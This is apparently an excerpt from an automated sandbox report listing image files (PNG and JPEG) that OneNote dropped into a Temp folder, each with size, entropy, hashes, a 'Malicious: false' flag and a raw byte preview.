Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Temp\{03AC5DB5-D7D9-426A-A37A-EFD4EFAC7B9B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{044F96EC-EB7C-4B38-A110-9AAABD84882F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{04B80500-EE5B-4287-9A27-F121123B2659}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{05396612-E231-4EBF-A254-36E33E1B7198}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{05A6303F-6566-461E-B5AC-53BBA05319A8}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{061B3274-F6DC-44B0-B341-6E74E44D97D6}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Temp\{0679CD42-DD83-49F0-8D6E-D3FE98BCA7EF}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{06A3E423-BB65-4EBB-906E-09CB0F2BC278}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Temp\{06F468A7-049F-45DF-A417-9EE8D771C738}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{079A4792-80F9-4EEE-976B-1BC8055DCAF0}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Temp\{0A2D9CFD-2394-4516-8E04-D06A6A048EC0}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{0A687075-AFF3-4FDE-9288-E5AA1460AF3E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{0B0D92C9-47DB-41B3-8756-806F5E8C6183}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{0B5D64E7-87D2-43A1-BF9D-849AB2B6D599}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
